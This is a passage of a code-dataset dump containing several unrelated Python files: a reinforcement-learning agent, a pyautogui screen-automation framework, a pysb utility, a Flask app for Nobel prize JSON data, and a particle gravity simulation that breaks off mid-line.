self._critic_loss_tf = 0.5 * tf.reduce_mean(tf.square(norm_val_diff))\n\n self._actor_loss_tf = self._a_w_tf * self._a_logp_tf\n self._actor_loss_tf = 
-tf.reduce_mean(self._actor_loss_tf)\n\n self._actor_loss_tf += self._actor_bound_loss_weight * self._action_bound_loss(self._norm_a_pd_tf)\n\n if (self._action_l2_weight != 0):\n self._actor_loss_tf += self._action_l2_weight * self._action_l2_loss(self._norm_a_pd_tf)\n\n if (self._action_entropy_weight != 0):\n self._actor_loss_tf += self._action_entropy_weight * self._action_entropy_loss(self._norm_a_pd_tf)\n\n return\n\n def _build_solvers(self):\n critic_vars = self._tf_vars(self.MAIN_SCOPE + \"/\" + self.CRITIC_SCOPE)\n self._critic_opt = tf.train.MomentumOptimizer(learning_rate=self._critic_stepsize, momentum=self._critic_momentum)\n self._update_critic_op = self._critic_opt.minimize(self._critic_loss_tf, var_list=critic_vars)\n\n actor_vars = self._tf_vars(self.MAIN_SCOPE + \"/\" + self.ACTOR_SCOPE)\n self._actor_opt = tf.train.MomentumOptimizer(learning_rate=self._actor_stepsize, momentum=self._actor_momentum)\n self._update_actor_op = self._actor_opt.minimize(self._actor_loss_tf, var_list=actor_vars)\n return\n\n def _get_actor_inputs(self):\n norm_s_tf = self._s_norm.normalize_tf(self._s_tf)\n input_tfs = [norm_s_tf]\n return input_tfs\n\n def _get_critic_inputs(self):\n norm_s_tf = self._s_norm.normalize_tf(self._s_tf)\n input_tfs = [norm_s_tf]\n return input_tfs\n\n def _build_net_actor(self, input_tfs, reuse=False):\n h = net_util.build_conv_net(input_tfs=input_tfs, layers=self._actor_net_layers, reuse=reuse)\n norm_a_pd_tf = self._build_action_pd(input_tf=h, init_output_scale=self._actor_init_output_scale,\n reuse=reuse)\n return norm_a_pd_tf\n\n def _build_net_critic(self, input_tfs, reuse=False):\n out_size = 1\n h = net_util.build_conv_net(input_tfs=input_tfs, layers=self._critic_net_layers, reuse=reuse)\n norm_val_tf = tf.layers.dense(inputs=h, units=out_size, activation=None,\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\n reuse=reuse);\n norm_val_tf = tf.squeeze(norm_val_tf, axis=-1)\n return norm_val_tf\n \n def _update(self, iter, new_sample_count):\n idx = np.array(self._replay_buffer.get_unrolled_indices())\n \n end_mask = self._replay_buffer.is_path_end(idx)\n valid_mask = np.logical_not(end_mask)\n valid_idx = idx[valid_mask]\n valid_idx = np.column_stack([valid_idx, np.nonzero(valid_mask)[0]])\n \n # update critic\n vals = self._compute_batch_vals(idx)\n new_vals = self._compute_batch_new_vals(idx, vals)\n \n critic_steps = int(np.ceil(self._critic_steps * new_sample_count / self._samples_per_iter))\n critic_losses = self._update_critic(critic_steps, valid_idx, new_vals)\n\n # update actor\n vals = self._compute_batch_vals(idx)\n new_vals = self._compute_batch_new_vals(idx, vals)\n adv, norm_adv, adv_mean, adv_std = self._calc_adv(new_vals, vals, valid_mask)\n adv_weights, adv_weights_mean, adv_weights_min, adv_weights_max = self._calc_adv_weights(norm_adv, valid_mask)\n \n actor_steps = int(np.ceil(self._actor_steps * new_sample_count / self._samples_per_iter))\n actor_losses = self._update_actor(actor_steps, valid_idx, adv_weights)\n\n\n self._critic_step_count += critic_steps\n self._actor_step_count += actor_steps\n \n self._logger.log_tabular(\"Critic_Loss\", critic_losses[\"loss\"])\n self._logger.log_tabular(\"Critic_Steps\", self._critic_step_count)\n self._logger.log_tabular(\"Actor_Loss\", actor_losses[\"loss\"])\n self._logger.log_tabular(\"Actor_Steps\", self._actor_step_count)\n \n self._logger.log_tabular(\"Adv_Mean\", adv_mean)\n self._logger.log_tabular(\"Adv_Std\", adv_std)\n self._logger.log_tabular(\"Adv_Weights_Min\", 
adv_weights_min)\n self._logger.log_tabular(\"Adv_Weights_Mean\", adv_weights_mean)\n self._logger.log_tabular(\"Adv_Weights_Max\", adv_weights_max)\n \n info = {\"critic_info\": critic_losses, \"actor_info\": actor_losses}\n return info\n \n def _update_critic(self, steps, sample_idx, tar_vals):\n num_idx = sample_idx.shape[0]\n steps_per_shuffle = int(np.ceil(num_idx / self._critic_batch_size))\n losses = None\n\n for b in range(steps):\n if (b % steps_per_shuffle == 0):\n np.random.shuffle(sample_idx)\n\n batch_idx_beg = b * self._critic_batch_size\n batch_idx_end = batch_idx_beg + self._critic_batch_size\n critic_batch_idx = np.array(range(batch_idx_beg, batch_idx_end), dtype=np.int32)\n critic_batch_idx = np.mod(critic_batch_idx, num_idx)\n\n critic_batch = sample_idx[critic_batch_idx]\n critic_batch_vals = tar_vals[critic_batch[:,1]]\n critic_s = self._replay_buffer.get(\"states\", critic_batch[:,0])\n\n curr_losses = self._step_critic(critic_s, critic_batch_vals)\n\n if (losses is None):\n losses = curr_losses\n else:\n for key, val in curr_losses.items():\n losses[key] += val\n \n for key in losses.keys():\n losses[key] /= steps\n\n return losses\n\n def _update_actor(self, steps, sample_idx, adv_weights):\n num_idx = sample_idx.shape[0]\n steps_per_shuffle = int(np.ceil(num_idx / self._actor_batch_size))\n losses = None\n\n for b in range(steps):\n if (b % steps_per_shuffle == 0):\n np.random.shuffle(sample_idx)\n\n batch_idx_beg = b * self._actor_batch_size\n batch_idx_end = batch_idx_beg + self._actor_batch_size\n actor_batch_idx = np.array(range(batch_idx_beg, batch_idx_end), dtype=np.int32)\n actor_batch_idx = np.mod(actor_batch_idx, num_idx)\n \n actor_batch = sample_idx[actor_batch_idx]\n actor_batch_adv = adv_weights[actor_batch[:,1]]\n actor_s = self._replay_buffer.get(\"states\", actor_batch[:,0])\n actor_a = self._replay_buffer.get(\"actions\", actor_batch[:,0])\n\n curr_losses = self._step_actor(actor_s, actor_a, actor_batch_adv)\n\n if (losses is None):\n losses = curr_losses\n else:\n for key, val in curr_losses.items():\n losses[key] += val\n \n for key in losses.keys():\n losses[key] /= steps\n\n return losses\n\n def _step_critic(self, s, tar_vals):\n feed = {\n self._s_tf: s,\n self._tar_val_tf: tar_vals\n }\n\n run_tfs = [self._update_critic_op, self._critic_loss_tf]\n losses = self._sess.run(run_tfs, feed)\n losses = {\"loss\": losses[1]}\n return losses\n \n def _step_actor(self, s, a, a_w):\n feed = {\n self._s_tf: s,\n self._a_tf: a,\n self._a_w_tf: a_w,\n }\n\n run_tfs = [self._update_actor_op, self._actor_loss_tf]\n losses = self._sess.run(run_tfs, feed)\n losses = {\"loss\": losses[1]}\n return losses\n \n def _compute_batch_vals(self, idx):\n states = self._replay_buffer.get(\"states\", idx)\n vals = self.eval_critic(states)\n\n is_end = self._replay_buffer.is_path_end(idx)\n is_fail = self._replay_buffer.check_terminal_flag(idx, rl_path.Terminate.Fail)\n is_fail = np.logical_and(is_end, is_fail) \n\n vals[is_fail] = 0.0\n\n return vals\n\n def _compute_batch_new_vals(self, idx, val_buffer):\n # use td-lambda to compute new values\n new_vals = np.zeros_like(val_buffer)\n n = len(idx)\n\n start_i = 0\n while start_i < n:\n start_idx = idx[start_i]\n path_len = self._replay_buffer.get_pathlen(start_idx)\n end_i = start_i + path_len\n end_idx = idx[end_i]\n\n test_start_idx = self._replay_buffer.get_path_start(start_idx)\n test_end_idx = self._replay_buffer.get_path_end(start_idx)\n assert(start_idx == test_start_idx)\n assert(end_idx == test_end_idx)\n\n 
path_indices = idx[start_i:(end_i + 1)]\n r = self._replay_buffer.get(\"rewards\", path_indices[:-1])\n v = val_buffer[start_i:(end_i + 1)]\n\n new_vals[start_i:end_i] = self._compute_return(r, self._discount, self._td_lambda, v)\n start_i = end_i + 1\n \n return new_vals\n\n def _compute_return(self, rewards, discount, td_lambda, val_t):\n # computes td-lambda return of path\n path_len = len(rewards)\n assert len(val_t) == path_len + 1\n\n return_t = np.zeros(path_len)\n last_val = rewards[-1] + discount * val_t[-1]\n return_t[-1] = last_val\n\n for i in reversed(range(0, path_len - 1)):\n curr_r = rewards[i]\n next_ret = return_t[i + 1]\n curr_val = curr_r + discount * ((1.0 - td_lambda) * val_t[i + 1] + td_lambda * next_ret)\n return_t[i] = curr_val\n \n return return_t\n\n def _calc_adv(self, new_vals, vals, valid_mask):\n adv = new_vals - vals\n\n valid_adv = adv[valid_mask]\n adv_mean = np.mean(valid_adv)\n adv_std = np.std(valid_adv)\n\n norm_adv = (adv - adv_mean) / (adv_std + self.ADV_EPS)\n return adv, norm_adv, adv_mean, adv_std\n\n def _calc_adv_weights(self, adv, valid_mask):\n weights = np.exp(adv / self._temp)\n\n valid_weights = weights[valid_mask]\n weights_mean = np.mean(valid_weights)\n weights_min = np.min(valid_weights)\n weights_max = np.max(valid_weights)\n\n weights = np.minimum(weights, self._weight_clip)\n return weights, weights_mean, weights_min, weights_max\n","sub_path":"awr/learning/conv_awr_agent.py","file_name":"conv_awr_agent.py","file_ext":"py","file_size_in_byte":15736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"562488182","text":"import pyautogui\r\nimport time\r\nimport subprocess\r\nimport matplotlib.pyplot as plt\r\nfrom typing import Union\r\nimport functools\r\nimport pyscreeze\r\nimport os\r\nimport mss\r\nfrom PIL import Image\r\nimport pywinauto\r\nimport pygetwindow as gw\r\nimport datetime\r\nimport re\r\nimport pygetwindow._pygetwindow_win\r\n\r\n######################################## Baseline functions ################################################################\r\ndef detect_monitor(my_operating_monitor = 0, verbose = True):\r\n sct = mss.mss()\r\n combined_resolution = sct.monitors[0]\r\n each_resolution = sct.monitors[1:]\r\n if verbose is True:\r\n msg = ''\r\n for i in range(len(each_resolution)):\r\n msg += f\"\\nmonitor {i}| position: ({each_resolution[i]['left']}, {each_resolution[i]['top']})| size: ({each_resolution[i]['width']}x{each_resolution[i]['height']})\"\r\n print(f'detected {len(each_resolution)} monitors.'+msg)\r\n\r\n print(f'selected monitor is monitor \"{my_operating_monitor}\"')\r\n res = []\r\n for k, v in each_resolution[my_operating_monitor].items():\r\n res.append(v)\r\n return tuple(res)\r\n\r\ndef locate(*images, For=0.0, region=None, grayscale=None, confidence: Union[float,list]=0.8, verbose = False):\r\n imglist = list(images)\r\n retVal = [None] * len(imglist)\r\n if region is None:\r\n region = detect_monitor(-1, verbose = False) # default monitor is the last(rightmost) one.\r\n start = time.time()\r\n if not isinstance(confidence, list):\r\n confidence = [confidence]\r\n while True:\r\n with mss.mss() as sct:\r\n ltrb = (region[0], region[1], region[0] + region[2], region[1] + region[3])\r\n x = sct.grab(monitor=ltrb)\r\n screenshotIm = Image.frombytes(\"RGB\", x.size, x.bgra, \"raw\", \"BGRX\")\r\n for i in range(len(imglist)):\r\n for conf in confidence:\r\n try:\r\n imglist[i] = pyscreeze._load_cv2(imglist[i], grayscale = grayscale)\r\n 
bbox = pyscreeze.locate(imglist[i], screenshotIm, grayscale = grayscale, confidence = conf)\r\n retVal[i] = (int(bbox[0] + bbox[2]/2 + region[0]), int(bbox[1] + bbox[3]/2) + region[1])\r\n del imglist[i]\r\n if verbose is True:\r\n print(f'{i}th image found on confidence {conf}')\r\n except OSError as e:\r\n raise e\r\n except Exception:\r\n pass\r\n if any(retVal) or time.time() - start > For:\r\n if len(retVal) == 1:\r\n return retVal[0], screenshotIm\r\n else:\r\n return retVal, screenshotIm\r\n\r\ndef click(x=None, y=None, n=1, interval=0.0, button=pyautogui.PRIMARY, duration=0.0, tween=pyautogui.linear, pause=0.0, logScreenshot=False, ori = True):\r\n if isinstance(x, tuple) and y is None:\r\n x, y = x\r\n for _ in range(n):\r\n ori_x, ori_y = pyautogui.position()\r\n pyautogui.click(x = x, y = y, button = button, duration = duration,tween = tween,logScreenshot = logScreenshot, _pause = False)\r\n if ori is True:\r\n pyautogui.moveTo(ori_x, ori_y)\r\n time.sleep(interval)\r\n time.sleep(pause)\r\n\r\nclass image():\r\n def __init__(self, *paths, confidence: Union[float, list] = 0.8, region = None, grayscale = None, verbose = False, home = '', extension = ''):\r\n # Variable initialization\r\n if not home and not extension:\r\n self.paths = paths\r\n else:\r\n self.paths = tuple(home + path + extension for path in paths)\r\n if not isinstance(confidence, list):\r\n self.confidence = [confidence]\r\n self.clicked = False\r\n self.region = region\r\n self.grayscale = grayscale\r\n self.scr, self.location, self.exist = self.locate_images()\r\n if verbose is True:\r\n self.verbose(verbose)\r\n def locate_images(self):\r\n # for plural *paths: \"any(image(*paths).exist)\" and \"all(image(*paths).exist)\" are allowed\r\n # for singular path: \"image(path).exist\" is allowed\r\n res, scr = locate(*self.paths, confidence = self.confidence, region = self.region, grayscale = self.grayscale, verbose = False)\r\n if not isinstance(res, list):\r\n res = [res]\r\n if len(res) == 1:\r\n return scr, res[0], bool(res[0])\r\n else:\r\n return scr, res, [bool(item) for item in res]\r\n def click(self, n = 1, ax = 0, ay = 0, interval=0.0, duration=0.0, tween=pyautogui.linear, pause=0.0, button=pyautogui.PRIMARY, ori = False):\r\n if not isinstance(self.exist, list):\r\n exist = [self.exist]\r\n else:\r\n exist = self.exist\r\n if any(exist) is False:\r\n return\r\n else:\r\n for i in range(len(exist)):\r\n if exist[i] is True:\r\n if len(self.paths) == 1:\r\n x, y = self.location\r\n else:\r\n x, y = self.location[i]\r\n click(x + ax, y + ay, n, interval, button, duration, tween, pause, ori = ori)\r\n self.clicked = True\r\n return\r\n\r\n def verbose(self, v):\r\n # display images\r\n n_img = len(self.paths)\r\n if v is True:\r\n if n_img == 1:\r\n plt.imshow(plt.imread(self.paths[0]))\r\n plt.show()\r\n else:\r\n fig = plt.figure()\r\n for i in range(n_img):\r\n fig.add_subplot(1, n_img, i + 1)\r\n plt.imshow(plt.imread(self.paths[i]))\r\n plt.show()\r\n\r\ndef exception(exc): # if exception met, abandon all turn progress. 
And goto specific turn.\r\n for item in exc:\r\n if image(item[0], verbose=False).exist:\r\n return True, item[1]\r\n\r\ndef debug_process(scr, turn, done):\r\n if scr is None:\r\n return\r\n now = datetime.datetime.today()\r\n name = now.strftime('%Y-%m-%d_%H')\r\n if name not in os.listdir():\r\n os.mkdir(name)\r\n with open(f'./{name}/{name}.txt', 'w', encoding = 'utf-8') as f:\r\n f.write('')\r\n scr.save(f'./{name}/{turn}.png')\r\n with open(f'./{name}/{name}.txt', 'a') as f:\r\n f.write(f\"{turn}/{'fail'*(not done)}+{'success'*done}\")\r\n return\r\n\r\ndef focus_to_window(window_title=None):\r\n window = gw.getWindowsWithTitle(window_title)[0]\r\n if window.isActive == False:\r\n pywinauto.application.Application().connect(handle=window._hWnd).top_window().set_focus()\r\ndef change_turns(below, n):\r\n matches = re.finditer(f'(if turn ?== ?(\\d+))|(goto\\((\\d+)\\))', below, re.MULTILINE)\r\n k = 0\r\n for matchNum, match in enumerate(matches):\r\n if match.groups()[1]:\r\n number_part = 1\r\n elif match.groups()[3]:\r\n number_part = 3\r\n ind = match.span(number_part + 1)\r\n old_num = match.groups()[number_part]\r\n new_num = int(old_num) + n\r\n below = below[:ind[0] + k] + str(new_num) + below[ind[1] + k:]\r\n if len(str(new_num)) > len(old_num):\r\n k += 1\r\n return below\r\ndef getWindowForever(title):\r\n window = []\r\n while not window:\r\n window = pyautogui.getWindowsWithTitle(title)\r\n window = window[0]\r\n return window # type: pygetwindow._pygetwindow_win.Win32Window\r\n\r\n# attach \"turn_controller\" to any action. action return should contain boolean\r\ndef turn_controller(action, debug_env = True):\r\n def wrapper_function(*args, fail_then_to = None, For = 3.0, pause = 2.0, exc = (), **kwargs):\r\n # init\r\n global turn; turn_before = turn\r\n global again\r\n if again is False:\r\n For = 0\r\n timeout = time.time() + For\r\n # keep doing the action until {timeout}\r\n while True:\r\n # action_return will be either (done:bool, scr:Image) or (done:bool,)\r\n action_return = action(*args, **kwargs)\r\n if isinstance(action_return, bool):\r\n done = action_return\r\n else: # in case action_return is (True, Image) or (True,)\r\n done = action_return[0]\r\n if len(action_return) == 2:\r\n scr = action_return[1] # type:PIL.Image.Image\r\n else:\r\n scr = None\r\n if done:\r\n turn += 1\r\n again = True\r\n after_done = time.time()\r\n break\r\n # after timeout, 3 cases\r\n if time.time() > timeout:\r\n # 1. exception check : when exception -> goto specified turn\r\n exc_res = exception(exc)\r\n if exc_res is not False:\r\n turn = exc_res[1]\r\n break\r\n # 2. again is True: go back in default\r\n elif again is True:\r\n if fail_then_to:\r\n turn = fail_then_to\r\n break\r\n else:\r\n turn -= 1\r\n break\r\n # 3. 
again is False: move on to next turn\r\n else:\r\n turn += 1\r\n break\r\n\r\n print(f\"turn {turn_before} : {'fail'*(not done)}+{'success'*done} --> {turn}\")\r\n if debug_env is True:\r\n debug_process(scr, turn_before, done)\r\n while time.time() - after_done < pause:\r\n time.sleep(0.1) # if pause time still remains after debugging etc., just wait it out\r\n return\r\n return wrapper_function\r\n\r\n@turn_controller\r\ndef try_click(*img_paths, region = None, confidence = 0.8, n = 1, nSearch = False, interval = 2.0, ax = 0, ay = 0, verbose = True):\r\n img = image(*img_paths, confidence = confidence, verbose = verbose, region = region)\r\n if nSearch is False:\r\n if interval == 2.0:\r\n interval = 0.3\r\n img.click(n = n, interval = interval, ax=ax, ay=ay)\r\n if nSearch is True:\r\n while True:\r\n img.click(n = 1, ax = ax, ay = ay)\r\n if img.clicked is True:\r\n n -= 1\r\n img.clicked = False\r\n time.sleep(interval)\r\n if n < 1:\r\n break\r\n return True, img.scr\r\n\r\ndef goto(to: Union[int,float]):\r\n global turn\r\n print(f'turn has been redirected: {turn} --> {to}')\r\n turn = to\r\n\r\n@turn_controller\r\ndef drag(From:tuple, To:tuple, duration=0.3):\r\n from_x, from_y = From\r\n To_x, To_y = To\r\n ori_x, ori_y = pyautogui.position()\r\n pyautogui.moveTo(from_x, from_y)\r\n pyautogui.dragTo(To_x, To_y, duration=duration)\r\n pyautogui.moveTo(ori_x, ori_y)\r\n return True\r\n######################################## Utility functions ############################################################\r\n\r\ndef spacing(turn, n, script_name = None):\r\n if script_name is None:\r\n script_name = __file__\r\n if script_name == '<input>':\r\n script_name = 'pyauto.py'\r\n if script_name not in os.listdir():\r\n print(\"if you are using interactive interpreter like pycharm's console and changed script name from pyauto.py,\"\r\n f\" you should specify current script name. || detected default script_name : {script_name}\")\r\n with open(script_name, mode='r') as f:\r\n script = f.read()\r\n\r\n pattern = re.compile(f'if turn ?== ?{turn}')\r\n until = pattern.search(script).span()[0]\r\n above = script[:until]\r\n below = script[until:]\r\n below = change_turns(below, n)\r\n\r\n script = above + below\r\n\r\n with open(script_name, mode = 'w') as f:\r\n f.write(script)\r\n#################################################################### What you are likely to do #####################\r\n### Basic actions\r\n# image('image1').exist\r\n# image('image1').location\r\n# image('image1').click()\r\n# image('image1').clicked\r\n# x, y = locate('image1','image2', confidence = 0.8)\r\n# click(x, y, n = 12)\r\n# drag(From = window.bottom, To = image('image2').location)\r\n# goto(10)\r\n\r\n### check window status and switch around\r\n# window.activate()\r\n# window.maximize() # pyautogui is scale dependent, so never ever try to detect an image at different scales\r\n# window.center\r\n# window.box\r\n# window.moveTo() # pyautogui only works on main monitor. So, move it to main monitor.\r\n\r\n### Mouse Drag template\r\n# pyautogui.moveTo(window.center) # pyautogui.moveTo(image('an_image.png').location)\r\n\r\n### modify default parameters: you can change source function, or below\r\n# try_click = functools.partial(try_click, For = 10) # change default parameters. applied to all try_click actions\r\n# try_click = functools.partial(try_click, ) # change default parameters. 
applied to all try_click actions\r\n\r\n### miscellaneous\r\n# pyautogui.typewrite() # keyboard typing\r\n# proc.kill()\r\n\r\n### Syntax example\r\n# if image('image1').exist:\r\n# image('image2').click(n = 2)\r\n######################################## User Configuration ############################################################\r\nif __name__ == \"__main__\":\r\n class image(image): # inherit image class and modify it. without it, image class gets absolute path.\r\n def __init__(self, *paths, confidence: Union[float, list] = 0.8, region = None, grayscale = None, verbose = False, home = '', extension = ''):\r\n if not home: # No specific parameter for home. then,\r\n home = './' # give default parameters\r\n elif not home.endswith('/'): # in case you missed out slash\r\n home = home + '/'\r\n if not extension:\r\n extension = '.png'\r\n if not region: # No specific parametor for which monitor. then,\r\n region = detect_monitor(-1, verbose = False) # the rightmost monitor is where image locate works.\r\n # or you can specify small region where locate_image works, like region = tuple(left, top, width, height)\r\n # specifying small region increases locating speed dramatically, because taking a screenshot itself takes long time.\r\n super().__init__(*paths, confidence = confidence, region = region, grayscale = grayscale, verbose = verbose, home = home, extension = extension)\r\n def click(self, n = 1, ax = 0, ay = 0, interval=0.0, duration=0.0, tween=pyautogui.linear, pause=0.0, logScreenshot=False, button=pyautogui.PRIMARY):\r\n super().click(n = n, ax = ax, ay = ay, interval=interval, duration=duration, tween=tween, pause=pause, button=button)\r\n\r\n exc = (('0_exception', -10),) # check everytime if this image exists. then, go to the specified turn.\r\n exc = () # disable exception checking\r\n exception = functools.partial(exception, exc = exc)\r\n\r\n proc = subprocess.Popen('Program_path_you_want_to_run');time.sleep(3)\r\n\r\n window = getWindowForever(\"window_title\")\r\n x,y,w,h = detect_monitor(-1)\r\n window.moveTo(x,y)\r\n window.resizeTo(w,h)\r\n\r\n x_qua = window.size[0]/3\r\n y_qua = window.size[1]/3\r\n center = window.center\r\n top = (window.center[0], window.center[1] - y_qua) # 1/4 from top\r\n bottom = (window.center[0], window.center[1] + y_qua) # 3/4 from bottom\r\n left = (window.center[0] - x_qua, window.center[1])\r\n right = (window.center[0] + x_qua, window.center[1])\r\n\r\n global_count = 1\r\n turn = 1\r\n checkpoint = 0\r\n turn_history = []\r\n loop_count = 0\r\n count = 1\r\n while global_count >= 1:\r\n if turn == -10: # when there is critical exception, you can restart from exceptional turn -10\r\n proc.kill()\r\n time.sleep(3)\r\n subprocess.Popen('your_program')\r\n time.sleep(20)\r\n goto(1)\r\n\r\n ################################################ BODY BORDER ###########################################################\r\n if turn == 999:\r\n proc.kill()\r\n\r\n turn_history.append(turn)\r\n loop_count += 1\r\n if loop_count > 100:\r\n loop_count = 0\r\n if len(set(turn_history[-50:])) < 3 and count == 1:\r\n break","sub_path":"pyturn_factory.py","file_name":"pyturn_factory.py","file_ext":"py","file_size_in_byte":16233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30095745","text":"from pysb.util import rules_using_parameter\nfrom pysb import Parameter, ComponentSet\n\ndef merge_parameters(model, new_name, parameters):\n unique_values = {parameter.value for parameter in parameters}\n if 
len(unique_values) > 1:\n raise ValueError(\"Given parameters have different values: %s\" %\n (', '.join('%s=%g' % (p.name, p.value)\n for p in parameters)))\n value = parameters[0].value\n rules = ComponentSet()\n for parameter in parameters:\n rules |= rules_using_parameter(model, parameter)\n if not rules:\n raise ValueError(\"Model has no rules using given parameters: %s\" %\n ', '.join(p.name for p in parameters))\n try:\n new_parameter = model.parameters[new_name]\n if new_parameter.value != value:\n raise ValueError(\"Parameter %s is already present in the model \"\n \"with the value %g, which differs from the \"\n \"common value of the given parameters, %g\" %\n (new_parameter.name, new_parameter.value, value))\n except KeyError:\n new_parameter = Parameter(new_name, value)\n model.add_component(new_parameter)\n for rule in rules:\n for attr in 'rate_forward', 'rate_reverse':\n if getattr(rule, attr) in parameters:\n setattr(rule, attr, new_parameter)\n","sub_path":"rasmodel/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"36597873","text":"#!/usr/bin/env python\n\n#import necessary libraries\n# pip install flask \n#export FLASK_APP=flask-app\n#flask run\nfrom flask import Flask, json, flash,render_template, session,request,jsonify,redirect, url_for\nimport os\nimport pandas as pd\npd.set_option('display.max_columns',15)\n\n#create instance of Flask app\napp = Flask(__name__)\n\n#decorator \n@app.route(\"/\")\ndef echo_hello():\n return \"<p>Hello Nobel.json!!!!!</p>\"\n\n@app.route(\"/all\")\ndef nobel():\n json_url = os.path.join(app.static_folder,\"\",\"nobel.json\")\n data_json = json.load(open(json_url))\n return render_template('index.html',data=data_json)\n\n\n@app.route(\"/<year>\",methods=[\"GET\",\"POST\"])\ndef nobel_year(year):\n json_url = os.path.join(app.static_folder,\"\",\"nobel.json\")\n data_json = json.load(open(json_url))\n data = data_json['prizes']\n year = request.view_args['year']\n\n if request.method == \"GET\":\n output_data = [x for x in data if x['year']==year]\n return render_template('user_nobel.html',data=output_data)\n\n elif request.method == \"POST\":\n category = request.form['category']\n id=request.form[\"id\"]\n firstname=request.form['firstname']\n surname=request.form['surname']\n motivation=request.form['motivation']\n share=request.form['share']\n create_row_data= {'year': year, 'category': category, 'laureates': [{'id': id, 'firstname': firstname, 'surname': surname,'motivation': motivation, 'share': share}]}\n print (create_row_data)\n filename='./static/nobel.json'\n with open(filename,'r+') as file:\n file_data = json.load(file)\n file_data['prizes'].append(create_row_data)\n file.seek(0)\n json.dump(file_data, file, indent = 4)\n \n return render_template('user_nobel.html',data=create_row_data)\n \n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"flask-nobel1/flask-nobel1.py","file_name":"flask-nobel1.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322583604","text":"from lib import Particle, Vector\nfrom matplotlib import pyplot as plt\nfrom statistics import stdev, mean\nfrom math import sqrt\nfrom multiprocessing import Process, Manager\n\nclass Universe:\n def __init__(self, tickScalingFactor, density=2650):\n self.parts = []\n self.tickLen = 0\n self.tickSF = tickScalingFactor\n 
self.density = density\n plt.ion()\n self.touches = 0\n self.g = 6.67*(10**(-11))\n self.cullat = 40000000000000\n\n def randomize(self, numParts, minPos, maxPos, minVel, maxVel, minSize, maxSize,):\n self.parts = [Particle.rand_part(minPos, maxPos, minSize, maxSize, minVel, maxVel, self.density) for i in range(numParts)]\n self.xmin = minPos.x\n self.xmax = maxPos.x\n self.ymin = minPos.y\n self.ymax = maxPos.y\n self.avgVel = sum(abs(p.velocity) for p in self.parts) / len(self.parts)\n self.avgSize = sum(p.size for p in self.parts) / len(self.parts)\n self.totalMass = sum(p.size for p in self.parts)\n\n\n def par_run_helper(self, part, destroy, add):\n for other in self.parts:\n if other not in destroy and other is not part:\n if part.touches(other):\n add.append(part + other)\n destroy.append(other)\n destroy.append(part)\n self.touches += 1\n #print(\"TOUCH \" + str(part.size + other.size))\n else:\n part.interact(other, self.g)\n\n def par_run(self, numTicks=1, visualizeEvery=1, visualizeAfter=0):\n manager = Manager()\n destroy = manager.list()\n add = manager.list()\n for tick in range(numTicks):\n #print(tick)\n processes = []\n for part in self.parts:\n p = Process(target=self.par_run_helper, args=(part, destroy, add))\n p.start()\n processes+=[p]\n print(len(processes))\n print('start')\n for p in processes:\n p.join()\n print('end')\n for p in destroy:\n try:\n self.parts.remove(p)\n except Exception:\n pass\n for p in add:\n self.parts.append(p)\n\n self.avgVel = sum(abs(p.velocity) for p in self.parts) / len(self.parts)\n self.avgSize = sum(p.size for p in self.parts) / len(self.parts)\n #self.tickLen = 500000000 / self.avgVel#(((self.avgSize/self.density)**(1/3)) * 2) / self.avgVel\n\n for part in self.parts:\n part.move(self.tickLen)\n # if part.position.x < self.xmin:\n # self.xmin = part.position.x\n # if part.position.x > self.xmax:\n # self.xmax = part.position.x\n # if part.position.y < self.ymin:\n # self.ymin = part.position.y\n # if part.position.y > self.ymax:\n # self.ymax = part.position.y\n\n self.visualize(tick)\n\n def run(self, numTicks=1, visualizeEvery=1, visualizeAfter=0):\n for tick in range(numTicks):\n if len(self.parts) == 1:\n exit()\n\n destroy = []\n add = []\n for i, part in enumerate(self.parts):\n\n\n for other in self.parts[i+1:]:\n if other not in destroy:\n if part.touches(other):\n #add.extend(part.collide(other))\n add.append(part + other)\n destroy.append(other)\n destroy.append(part)\n self.touches += 1\n #print(\"TOUCH \" + str(part.size + other.size))\n else:\n part.interact(other, self.g)\n # if abs(part.velocity) > sqrt((2*self.g * (self.totalMass - part.size))/abs(part.position)):\n # #destroy.append(part)\n # part.velocity *= .75\n # # print(abs(part.velocity))\n # # print(sqrt((2*self.g * (self.totalMass - part.size))/abs(part.position)))\n # # print(\"Escape velocity reached!\")\n\n if part.total_dist > self.cullat:\n print('part destroyed with dist ' + str(part.total_dist))\n print(len(self.parts))\n destroy.append(part)\n\n for p in destroy:\n try:\n self.parts.remove(p)\n except Exception:\n pass\n for p in add:\n self.parts.append(p)\n\n self.avgVel = sum(abs(p.velocity) for p in self.parts) / len(self.parts)\n self.avgSize = sum(p.size for p in self.parts) / len(self.parts)\n self.cullat = max(self.cullat - tick*1000000000, 10000000000000)\n # print(self.cullat)\n # print(max(p.total_dist for p in self.parts), max(abs(p.velocity) for p in self.parts))\n #self.tickLen = 500000000 / 
self.avgVel#(((self.avgSize/self.density)**(1/3)) * 2) / self.avgVel\n\n for part in self.parts:\n part.move(self.tickLen)\n # if part.position.x < self.xmin:\n # self.xmin = part.position.x\n # if part.position.x > self.xmax:\n # self.xmax = part.position.x\n # if part.position.y < self.ymin:\n # self.ymin = part.position.y\n # if part.position.y > self.ymax:\n # self.ymax = part.position.y\n\n self.visualize(tick)\n\n def visualize(self, tick):\n plt.subplot().clear()\n axes = plt.gca()\n sf = 10\n\n try:\n xmean = mean(p.position.x for p in self.parts)\n xstdev = stdev(p.position.x for p in self.parts)\n\n ymean = mean(p.position.y for p in self.parts)\n ystdev = stdev(p.position.y for p in self.parts)\n\n self.xmin = xmean - 1.5 * xstdev\n self.xmax = xmean + 1.5 * xstdev\n self.ymin = ymean - 1.5 * ystdev\n self.ymax = ymean + 1.5 * ystdev\n except:\n pass\n\n self.tickLen = self.tickSF * (((self.xmax - self.xmin) + (self.ymax - self.ymin)) / 50000000000)\n\n axes.set_xlim([self.xmin, self.xmax])\n axes.set_ylim([self.ymin, self.ymax])\n plt.subplot().set_title('tick: ' + str(tick) + '\\nUnits: ' + str(len(self.parts)) + '\\nTick Length: ' + str(self.tickLen))\n for part in self.parts:\n c = 